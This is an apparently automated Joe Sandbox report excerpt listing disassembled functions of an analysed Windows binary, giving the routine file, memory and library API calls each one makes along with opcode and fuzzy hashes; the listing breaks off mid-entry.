                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Alloc
                                                                              • String ID: FlsAlloc
                                                                              • API String ID: 2773662609-671089009
                                                                              • Opcode ID: 06c499d17793be0b53557973423eb018b4dedeaa60803669555997e76925ddb4
                                                                              • Instruction ID: b8b402f46c1f97139491b12719392ee9c8d517af5546288a9f3ccd1f3cefe307
                                                                              • Opcode Fuzzy Hash: 06c499d17793be0b53557973423eb018b4dedeaa60803669555997e76925ddb4
                                                                              • Instruction Fuzzy Hash: C9E0E531A413187F8A006B649C0297EBB94CF58B22F41015AFD09A7350CF71AD49AEFA
                                                                              Function 00D3FD58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3FD6A
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 3Ro
                                                                              • API String ID: 1269201914-1492261280
                                                                              • Opcode ID: 125e256a3a9b8fcf526b39fc760dfc5a6c85909743e31edac5f72323c7d3d762
                                                                              • Instruction ID: 6234df69970bf08c2ddfff95f566ba195590746ee6677b2bbff224f2762a13cf
                                                                              • Opcode Fuzzy Hash: 125e256a3a9b8fcf526b39fc760dfc5a6c85909743e31edac5f72323c7d3d762
                                                                              • Instruction Fuzzy Hash: 53B012916685047D371423107C07F3A010CC4C0B12F70853AF881C004094444D4C1971
                                                                              Function 00D4CDB0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D4C97B: GetOEMCP.KERNEL32(00000000,?,?,00D4CC04,?), ref: 00D4C9A6
                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D4CC49,?,00000000), ref: 00D4CE24
                                                                              • GetCPInfo.KERNEL32(00000000,00D4CC49,?,?,?,00D4CC49,?,00000000), ref: 00D4CE37
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CodeInfoPageValid
                                                                              • String ID:
                                                                              • API String ID: 546120528-0
                                                                              • Opcode ID: 34069fca5099b752f8f94e65e4bc4d50741bfc171f0ad12c5433eefd1f164da6
                                                                              • Instruction ID: 56647feafa154cc152c3df4e4e2e3cd0ff5545d7bf635a957e8f79abea4aa315
                                                                              • Opcode Fuzzy Hash: 34069fca5099b752f8f94e65e4bc4d50741bfc171f0ad12c5433eefd1f164da6
                                                                              • Instruction Fuzzy Hash: 995126709223459FDB60CF75C8416BBBBE6EF41300F18546EE096C7252E7399945CBB0
                                                                              Function 00D2ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,00D2ACB0,?,?,00000000,?,?,00D29C8B,?), ref: 00D2AE3A
                                                                              • GetLastError.KERNEL32(?,?,00D29C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00D2AE49
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 7fa131d9c1e9b97a5b2e863509f31a52a91a62aeede09bd2492f596e5b055844
                                                                              • Instruction ID: 0a49a3584114e8302d601ac50539c1927804445bac1dc87f3dd15f25f8bfa74d
                                                                              • Opcode Fuzzy Hash: 7fa131d9c1e9b97a5b2e863509f31a52a91a62aeede09bd2492f596e5b055844
                                                                              • Instruction Fuzzy Hash: 814117352043658BD724AF2CF8846AA73E4FF7831AF180529E88587A51F7B1DC858B73
                                                                              Function 00D4CBE7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D4A515: GetLastError.KERNEL32(?,00D63070,00D45982,00D63070,?,?,00D45281,00000050,?,00D63070,00000200), ref: 00D4A519
                                                                                • Part of subcall function 00D4A515: _free.LIBCMT ref: 00D4A54C
                                                                                • Part of subcall function 00D4A515: SetLastError.KERNEL32(00000000,?,00D63070,00000200), ref: 00D4A58D
                                                                                • Part of subcall function 00D4A515: _abort.LIBCMT ref: 00D4A593
                                                                                • Part of subcall function 00D4CD0E: _abort.LIBCMT ref: 00D4CD40
                                                                                • Part of subcall function 00D4CD0E: _free.LIBCMT ref: 00D4CD74
                                                                                • Part of subcall function 00D4C97B: GetOEMCP.KERNEL32(00000000,?,?,00D4CC04,?), ref: 00D4C9A6
                                                                              • _free.LIBCMT ref: 00D4CC5F
                                                                              • _free.LIBCMT ref: 00D4CC95
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorLast_abort
                                                                              • String ID:
                                                                              • API String ID: 2991157371-0
                                                                              • Opcode ID: 579ce017c379dc294e1bd979577f9f71386c9e601e94e8027a4431f02591ebea
                                                                              • Instruction ID: a7331232d8a37baa36d6ec46a921ce71bdcb0c8facb191598b91163fdf5d5106
                                                                              • Opcode Fuzzy Hash: 579ce017c379dc294e1bd979577f9f71386c9e601e94e8027a4431f02591ebea
                                                                              • Instruction Fuzzy Hash: FF31E531901204EFDB50EF69D480BADBBF5EF40320F290099F4089B2A1EB769D41DBB0
                                                                              Function 00D2B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D27ED0,?,?,?,00000000), ref: 00D2B04C
                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D2B100
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlushTime
                                                                              • String ID:
                                                                              • API String ID: 1392018926-0
                                                                              • Opcode ID: ef2f46f04212d453dbf47c747e40006f1f57f6d645d29b09a43ad11c153eefff
                                                                              • Instruction ID: d784dfb0cb0a28d18cac6ac82ff51d52c6aa4c8e18e3a51077bd39e8a597517e
                                                                              • Opcode Fuzzy Hash: ef2f46f04212d453dbf47c747e40006f1f57f6d645d29b09a43ad11c153eefff
                                                                              • Instruction Fuzzy Hash: C92136312483519FC311CE74D991AABBBE4AF66318F08081EF4E0C3181D369D90CDB72
                                                                              Function 00D2A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D2B1B7,?,?,00D281FD), ref: 00D2A946
                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D2B1B7,?,?,00D281FD), ref: 00D2A976
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 057946585d35a54dccbbe71a2a89a0c5785b523c2bc2371cbda9189ebeb70fda
                                                                              • Instruction ID: 52d35d2ed353669b789782998ac9a592ee60107ddd7067c40249be3627d84a05
                                                                              • Opcode Fuzzy Hash: 057946585d35a54dccbbe71a2a89a0c5785b523c2bc2371cbda9189ebeb70fda
                                                                              • Instruction Fuzzy Hash: 6E2103714043546FE3308A29DC88BB777DCEB69329F950A19F9D5C21C1C774AC848A32
                                                                              Function 00D21F30 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D21F35
                                                                                • Part of subcall function 00D242F1: __EH_prolog.LIBCMT ref: 00D242F6
                                                                              • _wcslen.LIBCMT ref: 00D21FDA
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2838827086-0
                                                                              • Opcode ID: 778720d1e0d3c3baf3389c70d243d33d06d0d166d4da75d0fb1a53da753efcb4
                                                                              • Instruction ID: 761c81abfa7f73f28570e3c950198478bb877c4e9216c6df35903e087e526be7
                                                                              • Opcode Fuzzy Hash: 778720d1e0d3c3baf3389c70d243d33d06d0d166d4da75d0fb1a53da753efcb4
                                                                              • Instruction Fuzzy Hash: C3216B36904229AFCF11AF99D8919EEFBB5FF28304F10402DF455A32A1C7755951CB70
                                                                              Function 00D44D02 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00D840C4,?,?,?,00D44EF6,00000004,InitializeCriticalSectionEx,00D57424,InitializeCriticalSectionEx,00000000,?,00D44CAD,00D840C4,00000FA0), ref: 00D44D85
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00D44D8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeLibraryProc
                                                                              • String ID:
                                                                              • API String ID: 3013587201-0
                                                                              • Opcode ID: 34821b6695bff12ff0cf40db21dde038837cdf1b2234389fd68064bf5f5ff79e
                                                                              • Instruction ID: 26190684bbef7163c838d2a72662c19b2f1a1f117e79722757d13ffdfbb40fea
                                                                              • Opcode Fuzzy Hash: 34821b6695bff12ff0cf40db21dde038837cdf1b2234389fd68064bf5f5ff79e
                                                                              • Instruction Fuzzy Hash: 1B119336A016159F9F22CFA4EC80AAA73A9FF453607280169E945D7354E730DD81CBB0
                                                                              Function 00D2B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D2B157
                                                                              • GetLastError.KERNEL32 ref: 00D2B164
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 9f17807cc31e83d98aa6a97ea89bc87857225cb5fcacebfad671248923c680bf
                                                                              • Instruction ID: 387de1c9b3eeed962752f313acc311291429ce67cde32759dcb7d94944a80c14
                                                                              • Opcode Fuzzy Hash: 9f17807cc31e83d98aa6a97ea89bc87857225cb5fcacebfad671248923c680bf
                                                                              • Instruction Fuzzy Hash: 5111E931600720ABD7368B28E854766B3E9FF14378F64462AE592D31D0D7B0ED55C770
                                                                              Function 00D4A6A4 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00D4A6C5
                                                                                • Part of subcall function 00D4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4DBEC,00000000,?,00D480B1,?,00000008,?,00D4A871,?,?,?), ref: 00D4A830
                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00D630C4,00D2187A,?,?,00000007,?,?,?,00D213F2,?,00000000), ref: 00D4A701
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocAllocate_free
                                                                              • String ID:
                                                                              • API String ID: 2447670028-0
                                                                              • Opcode ID: 3b5a031f251d85a69bdfc7beea56b52a18d45a1869cd8add24b5ef08031f51dc
                                                                              • Instruction ID: f14071fdbddd516efa1274b198efe829b05e539c1ad3f284bba676c9623cf320
                                                                              • Opcode Fuzzy Hash: 3b5a031f251d85a69bdfc7beea56b52a18d45a1869cd8add24b5ef08031f51dc
                                                                              • Instruction Fuzzy Hash: BCF096311C1A11A7DB213B2EAC01F6B3768DF81BF1B1F4016F8159A191EE20DC40A5BB
                                                                              Function 00D323BD Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00D323CA
                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D323D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AffinityCurrentMask
                                                                              • String ID:
                                                                              • API String ID: 1231390398-0
                                                                              • Opcode ID: 351405c99bf6665ef90aac2026856f38ef454e0ffa248e7a39533d003d7f468c
                                                                              • Instruction ID: 3eee2dfcc4b9bdddf224591f0a34d8e27fbad4536f4ece3bd9a7d3a5092e3088
                                                                              • Opcode Fuzzy Hash: 351405c99bf6665ef90aac2026856f38ef454e0ffa248e7a39533d003d7f468c
                                                                              • Instruction Fuzzy Hash: EDE09233F11205A78F0987A8AC458FBB2ECDA44319B284179A903E3240E978DD4546B0
                                                                              Function 00D2F968 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 00D2F998
                                                                              • LoadStringW.USER32(?,?,00000200), ref: 00D2F9AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString
                                                                              • String ID:
                                                                              • API String ID: 2948472770-0
                                                                              • Opcode ID: 5d6f04d23b015e712d1eafab627b10832e767a42b209a60ba562aa558951db01
                                                                              • Instruction ID: a581d3996b6a1063e0edea97d1353ebd6cec62cb5f02194b498ca8c17816e4d8
                                                                              • Opcode Fuzzy Hash: 5d6f04d23b015e712d1eafab627b10832e767a42b209a60ba562aa558951db01
                                                                              • Instruction Fuzzy Hash: 12F0F832100229BBCF115F55EC08DAB7F6AFF1A390B004425FD0486234D2328960EBB0
                                                                              Function 00D2B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B8FA
                                                                                • Part of subcall function 00D2CF32: _wcslen.LIBCMT ref: 00D2CF56
                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B92B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2673547680-0
                                                                              • Opcode ID: 0b2c267471bbd2fd0ad899ed3f640a0a2bd56650873ee6d4ec4852f88f467cea
                                                                              • Instruction ID: ef53a2de48e9c129ad6958ed98d189f1cad577573751e190b4fd66afe2eff90f
                                                                              • Opcode Fuzzy Hash: 0b2c267471bbd2fd0ad899ed3f640a0a2bd56650873ee6d4ec4852f88f467cea
                                                                              • Instruction Fuzzy Hash: 1DF0A931105219BBDF115FA0DC00BDA376CFF143DAF048061BA44D62A4DB71DD949A30
                                                                              Function 00D2B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,00000000,?,00D2A438,?,?,?,?,00D2892B,?,?,?,00D5380F,000000FF), ref: 00D2B481
                                                                                • Part of subcall function 00D2CF32: _wcslen.LIBCMT ref: 00D2CF56
